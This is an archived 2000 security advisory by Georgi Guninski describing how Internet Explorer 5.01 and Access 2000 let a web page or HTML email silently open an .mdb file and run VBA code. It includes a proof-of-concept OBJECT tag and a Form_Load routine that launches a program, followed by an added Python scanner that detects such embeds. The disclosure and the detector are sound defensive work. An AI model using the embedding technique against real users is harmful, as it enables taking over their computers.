
ie5-access2000.txt

Posted Jun 29, 2000
Authored by Georgi Guninski | Site nat.bg

Georgi Guninski security advisory #14 - Internet Explorer 5.01 and Access 2000 allow executing programs when viewing a web page or HTML email message. This allows taking full control over user's computer. Access 2000 allows executing VBA code which has access to system resources and in particular executing files. Includes exploit code which silently opens and executes VBA code from Access 2000. Demonstration available here.

tags | exploit, web
SHA-256 | fe568442ae8f90da9486762f3cbbcbf6148ba69298f95dfc55f9dce550ddbebf

Georgi Guninski security advisory #14, 2000

IE 5 and Access 2000 vulnerability - executing programs

Systems affected: IE 5.01, Access 2000, Win98 - probably other versions,
have not tested
Risk: High

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or indirect use
of the information or functionality provided by this program.
Georgi Guninski bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:
Internet Explorer 5.01 and Access 2000 under Windows 98 (suppose other
versions are also vulnerable)
allow executing programs when viewing a web page or HTML email message -
(in the latter case with IFRAME).
This allows taking full control over user's computer.

Details:

Access 2000 allows executing VBA code which has access to system
resources and in particular executing files.
It is possible to silently open and execute an .mdb file from IE with the
code:
<OBJECT data="db3.mdb" id="d1"></OBJECT>
This allows executing VBA code from Access 2000, though it is not
visible to the user.

The code is:
-----------access.html----------------------------
<OBJECT data="db3.mdb" id="d1"></OBJECT>
-----------in Form1 of db3.mdb---------------------
Private Sub Form_Load()
    On Error GoTo Err_Command0_Click
    Dim stAppName As String
    stAppName = "C:\Program Files\Accessories\wordpad.exe"
    MsgBox ("Trying to start: " & stAppName)
    Call Shell(stAppName, 1)

Exit_Command0_Click:
    Exit Sub

Err_Command0_Click:
    MsgBox Err.Description
    Resume Exit_Command0_Click
End Sub
---------------------------------------------------
Form1 is automatically opened at database startup.

Demonstration is available at:
http://www.nat.bg/~joro/access.html


Copyright 2000 Georgi Guninski

Regards,
Georgi Guninski
http://www.nat.bg/~joro
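
For defenders, the embedding pattern shown under Details can be matched at a mail or web gateway. The following is an added example, not part of the advisory: a Python scanner that reports OBJECT elements whose data URL points at an .mdb file. The function and class names, the default extension set and the sample HTML are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Assumption: only the .mdb extension named in the advisory is flagged by
# default; callers can pass a larger set for other database file types.
DEFAULT_EXTS = frozenset({".mdb"})

class ObjectDataScanner(HTMLParser):
    """Collect <OBJECT data=...> URLs whose path ends in a flagged extension."""

    def __init__(self, exts=DEFAULT_EXTS):
        super().__init__(convert_charrefs=True)
        self.exts = tuple(e.lower() for e in exts)
        self.hits = []  # (line number, raw data attribute value)

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names (OBJECT == object).
        for name, value in attrs:
            if tag == "object" and name == "data" and value and self._flagged(value):
                self.hits.append((self.getpos()[0], value))

    def _flagged(self, url):
        # Compare only the URL path: drop ?query and #fragment, decode
        # percent-escapes, ignore case.
        try:
            path = urlsplit(url.strip()).path
        except ValueError:  # malformed URL: fall back to the raw string
            path = url
        return unquote(path).strip().lower().endswith(self.exts)

def find_mdb_objects(html, exts=DEFAULT_EXTS):
    """Return [(line, data_url), ...] for every flagged OBJECT element."""
    scanner = ObjectDataScanner(exts)
    scanner.feed(html)
    scanner.close()
    return scanner.hits

# Constructed sample input; the first tag is the one quoted in the advisory.
SAMPLE = """<html><body>
<OBJECT data="db3.mdb" id="d1"></OBJECT>
<object DATA="http://example.test/files/DB3%2EMDB?x=1#top"></object>
<object data="movie.swf"></object>
<img src="db3.mdb">
</body></html>"""

if __name__ == "__main__":
    for line, value in find_mdb_objects(SAMPLE):
        print(f"line {line}: OBJECT data={value!r}")
```

A hit means the page or message asks the browser to load a database file as an embedded object; a gateway can strip the element or quarantine the message.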

